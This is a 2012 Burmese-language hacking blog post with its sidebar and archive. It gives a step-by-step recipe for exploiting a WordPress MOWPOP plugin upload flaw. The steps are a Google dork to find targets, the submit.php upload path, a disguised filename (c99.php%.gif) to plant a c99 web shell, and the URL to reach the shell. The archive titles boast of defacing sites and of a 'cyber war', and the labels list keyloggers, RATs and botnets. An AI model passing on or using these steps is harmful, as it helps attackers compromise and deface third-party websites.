Tuesday, April 10, 2012
[MOWPOP] Plugin WP-CONTENT In WordPress Upload Exploitation
Published :
10:01 PM
Author :
shwekoyantaw
Google Dork : inurl:mowpop
Dork နဲ႕ရွာလို႕ရတဲ့ ဆိုဒ္ေတြက်လာရင္ /wp-content/plugins/mowpop/submit.php ဆိုျပီး ဆက္သြားလိုက္ပါ
ဥပမာ က်လာမယ့္ဆုိဒ္က www.target.com/topics/mowpop ဆိုပါစို႕ ဒါဆို www.target.com/wp-content/plugins/mowpop/submit.php ဆိုျပီး သြားလိုက္ပါ
Image Upload လုပ္ခြင့္ရတာေတြ႕ရပါလိမ့္မယ္ ဒါဆို Shell Type ကို Image File Type တစ္ခုခုေျပာင္းပါ
ဥပမာ c99.php%.gif ေပါ့
မိမိ တင္ထားတဲ့ Shell ကိုေတာ့ ေအာက္ပါ Directory မွ တစ္ဆင့္ Access လုပ္ႏိုင္ပါျပီ
wp-content/plugins/mowpop/editor/forms/pictures/User-Uploads/c99.php%5C0.gif
ဥပမာ www.target.com/wp-content/plugins/mowpop/editor/forms/pictures/User-Uploads/c99.php%5C0.gif
REF:1337 Days
post by ghost area(ghostarea.net)
Pageviewers
CBOX
Manutd-Results
LINK
Label
Android
(3)
autorun
(3)
Backtrack
(8)
batch file
(19)
blogger
(10)
Botnet
(2)
browser
(5)
Brute Force
(6)
cafezee
(2)
cmd
(5)
Cookies
(2)
crack
(12)
Cracking
(2)
crypter
(7)
DDos
(20)
deepfreeze
(4)
defacing
(1)
defence
(16)
domain
(4)
Dos
(9)
downloader
(4)
ebomb
(2)
ebook
(48)
Exploit
(26)
firewall
(3)
game
(2)
gmail
(11)
google hack
(16)
Hacking Show
(3)
Hash
(4)
hosting
(1)
icon changer
(1)
ip adress
(6)
Keygen
(1)
keylogger
(8)
knowledge
(67)
locker
(1)
maintainence
(8)
network
(17)
news
(31)
other
(35)
passwoard viewer
(7)
password
(12)
Philosophy
(6)
Phishing
(8)
premium account
(2)
proxy
(7)
RAT
(10)
run commands
(4)
script
(27)
Shell code
(10)
shortcut Key
(2)
SMTP ports
(1)
social engineering
(7)
spammer
(1)
SQL Injection
(30)
Stealer.crack
(5)
tools
(125)
Tools Pack
(4)
tutorial
(107)
USB
(3)
virus
(32)
website
(84)
WiFi
(4)
word list
(2)
HOW IS MY SITE?
Powered by Blogger.
Blog Archive
-
▼
2012
(210)
-
▼
April
(31)
- LFI with php://filter
- WiFi Hack နည္း ျမန္မာလို စာအုပ္
- Gmail Hacking is 100% work or not? And Gmail passw...
- Password is 123456 (ebook)
- XSS Overview Part 2 : Types of Attacking Techniques
- အားေပးေထာက္ခံေပးျခင္း
- Shell collections (download)
- HOW TO HACK WEBSITES ADMIN PANEL
- How to use m1rr0r:::::,..
- EzFilemanager Deface Upload vulnerability
- XCode SQL Injection/LFI/XSS Vulnurable & Webshell ...
- SQL Dork Lists (Download)
- XSS?? What is XSS??
- Happy New Year For All Myanmar
- Finish Operation Bangladesh
- My New Defacing Page
- Start cyber war Myanmar & BD
- http://americanrvadventures.com/ H@ck by Shwe K0
- Tw0 bangledesh sites hackeD
- [MOWPOP] Plugin WP-CONTENT In WordPress Upload Exp...
- သၾကၤန္ ကာလ ကၽြန္ေတာ္ ပိုစ့္ေရးျခင္းနားမည္..။
- My New Domain (ဆိုဒ္ လိပ္စာအသစ္)
- SPAW Vulnerably [ Tutorials ]
- How to r00t on server (Ebook)
- Messenger Password Recovery Tool
- Habits for Hacking Learners ;)
- XXXXXXXX***************xxxxxxxxxxxxxxxx[Tutorials]
- what is carders & what are they ?????
- Botnet Tutorial[Ebook]
- Gr3eNoX Exploit Scanner -Google Dork Scanner- SQLi...
- Timthumb Vuln & How can hack?
-
▼
April
(31)
Followers
About Me
Popular Posts
-
SQL Dorks အသစ္ေလးေတြလို႔ထင္ပါတယ္..ဒီက ဟက္ကာေတြအတြက္ေတာ့ ေဟာင္းခ်င္ေဟာင္းေနမွာေပါ့..ကၽြန္ေတာ့္ဆီရွိတာေလးေတြပါ..မၾကိဳက္လဲ ေနေပါ့. :P inurl...
-
--- မိတ္ဆက္--- Injection နဲ႔ပက္သက္တဲ႔အပုိင္းကုိ အေတြ႔အၾကံဳ မရင့္က်က္ေသးတဲ႔သူေတြ၊ အေတြ႔အၾကံဳရွိၿပီးတဲ႔သူေတြပါ နားလည္ႏုိင္ေအာင္ ကၽြန္ေတာ့္...
-
အေကာင္းစားမွန္ဘီလူး (မ်တ္ခ်က္။ ။ရွားေလာ့ဟုန္းဆီကမဟုတ္ပါ) ကၽြန္ေတာ္မွန္ဘီလူးေလးတစ္လက္ရထားတယ္။ ဘယ္ႏွယ္ဗ်ာ ကၽြန္ေတာ့္မွန္ဘီလူးကိုမ်ာ...
-
အဓိက က ေတာ့ forums ေတြပဲ. Register လုပ္မွ ၀င္ေရာက္ၾကည့္ရွဳ ႏိုင္မယ္.. bypass လုပ္ဖုိ႔ ကေတာ့ SQL injection ကေတာ့ အေကာင္းဆံုးေပါ့.. အခုေတာ့ ...
-
အသိပညာ ဗဟုသုတသည္ ဟက္ကာတုိ႔ရန္မွ ကာကြယ္ရန္ စြမ္းအားတစ္ခုၿဖစ္ေပသည္။ ယေန႔ေခတ္ အုိင္တီနယ္ပယ္ဆုိင္ရာ စီမံခန္႔ခြဲမႈတြင္ တာ၀န္ရွိသူမ်ားသည္ ၄င္းတ...
-
ဘာရယ္လို႕မဟုတ္ပါဘူး ဒီေန႕ဘာတင္ရ မလဲစဥ္းစားရင္း အေျခခံကစၾကတာေပါ့။ ပထမဆံုး notepad ကိုေခၚပါ။batch file ေရးနည္းက programmingအာလံုး .bat...
-
ကဲဆိုက္တစ္ခုကရတာျပန္ျပီးေတာ့ေ၀မွ်လိုက္ပါတယ္။စမ္းသပ္ခ်င္သူေတြအတြက္ပါ။ သံုးခ်င္ရင္ သံုးပါ။စည္ကမ္းေတာ့ရိွပါေစ။ code: http://13campaign.org...
-
LFI Local File Inclusion ေလး အေၾကာင္းေျပာခ်င္ပါတယ္ ညီကိုတို႔.... Online မွာ LFI ေပါက္ေနတဲ့ဆိုက္ေတြ သန္းခ်ီပီးရွိေနပါတယ္.... Web Hacking ေ...
-
ဒီပိုစ့္ေလးဟာ LFI ေပၚမွာဆင့္ကဲေျပာင္းလဲထားတာျဖစ္ျပီးေတာ့ BASE 64 php filter ကိုအသံုးျပဳမွာျဖစ္ပါတယ္....။ဆာဗာမွာရိွတဲ့ connect.php / conf...
-
၀ိကိလိခ္၏ အတြင္းေရးမ်ား ဆိုတဲ႔ စာအုပ္ကို MCM မွ ကို Giacomo က ဘာသာၿပန္ၿပီး တင္ေပးထားတာၿဖစ္ပါတယ္ ။ ဒီလိုစာအုပ္မ်ိဳးကို ဘာသာၿပန္ၿပီး တ...
Labels
- Android (3)
- autorun (3)
- Backtrack (8)
- batch file (19)
- blogger (10)
- Botnet (2)
- browser (5)
- Brute Force (6)
- cafezee (2)
- cmd (5)
- Cookies (2)
- crack (12)
- Cracking (2)
- crypter (7)
- DDos (20)
- deepfreeze (4)
- defacing (1)
- defence (16)
- domain (4)
- Dos (9)
- downloader (4)
- ebomb (2)
- ebook (48)
- Exploit (26)
- firewall (3)
- game (2)
- gmail (11)
- google hack (16)
- Hacking Show (3)
- Hash (4)
- hosting (1)
- icon changer (1)
- ip adress (6)
- Keygen (1)
- keylogger (8)
- knowledge (67)
- locker (1)
- maintainence (8)
- network (17)
- news (31)
- other (35)
- passwoard viewer (7)
- password (12)
- Philosophy (6)
- Phishing (8)
- premium account (2)
- proxy (7)
- RAT (10)
- run commands (4)
- script (27)
- Shell code (10)
- shortcut Key (2)
- SMTP ports (1)
- social engineering (7)
- spammer (1)
- SQL Injection (30)
- Stealer.crack (5)
- tools (125)
- Tools Pack (4)
- tutorial (107)
- USB (3)
- virus (32)
- website (84)
- WiFi (4)
- word list (2)
Labels
- Android (3)
- autorun (3)
- Backtrack (8)
- batch file (19)
- blogger (10)
- Botnet (2)
- browser (5)
- Brute Force (6)
- cafezee (2)
- cmd (5)
- Cookies (2)
- crack (12)
- Cracking (2)
- crypter (7)
- DDos (20)
- deepfreeze (4)
- defacing (1)
- defence (16)
- domain (4)
- Dos (9)
- downloader (4)
- ebomb (2)
- ebook (48)
- Exploit (26)
- firewall (3)
- game (2)
- gmail (11)
- google hack (16)
- Hacking Show (3)
- Hash (4)
- hosting (1)
- icon changer (1)
- ip adress (6)
- Keygen (1)
- keylogger (8)
- knowledge (67)
- locker (1)
- maintainence (8)
- network (17)
- news (31)
- other (35)
- passwoard viewer (7)
- password (12)
- Philosophy (6)
- Phishing (8)
- premium account (2)
- proxy (7)
- RAT (10)
- run commands (4)
- script (27)
- Shell code (10)
- shortcut Key (2)
- SMTP ports (1)
- social engineering (7)
- spammer (1)
- SQL Injection (30)
- Stealer.crack (5)
- tools (125)
- Tools Pack (4)
- tutorial (107)
- USB (3)
- virus (32)
- website (84)
- WiFi (4)
- word list (2)
Archive
-
▼
2012
(210)
-
▼
April
(31)
- LFI with php://filter
- WiFi Hack နည္း ျမန္မာလို စာအုပ္
- Gmail Hacking is 100% work or not? And Gmail passw...
- Password is 123456 (ebook)
- XSS Overview Part 2 : Types of Attacking Techniques
- အားေပးေထာက္ခံေပးျခင္း
- Shell collections (download)
- HOW TO HACK WEBSITES ADMIN PANEL
- How to use m1rr0r:::::,..
- EzFilemanager Deface Upload vulnerability
- XCode SQL Injection/LFI/XSS Vulnurable & Webshell ...
- SQL Dork Lists (Download)
- XSS?? What is XSS??
- Happy New Year For All Myanmar
- Finish Operation Bangladesh
- My New Defacing Page
- Start cyber war Myanmar & BD
- http://americanrvadventures.com/ H@ck by Shwe K0
- Tw0 bangledesh sites hackeD
- [MOWPOP] Plugin WP-CONTENT In WordPress Upload Exp...
- သၾကၤန္ ကာလ ကၽြန္ေတာ္ ပိုစ့္ေရးျခင္းနားမည္..။
- My New Domain (ဆိုဒ္ လိပ္စာအသစ္)
- SPAW Vulnerably [ Tutorials ]
- How to r00t on server (Ebook)
- Messenger Password Recovery Tool
- Habits for Hacking Learners ;)
- XXXXXXXX***************xxxxxxxxxxxxxxxx[Tutorials]
- what is carders & what are they ?????
- Botnet Tutorial[Ebook]
- Gr3eNoX Exploit Scanner -Google Dork Scanner- SQLi...
- Timthumb Vuln & How can hack?
-
▼
April
(31)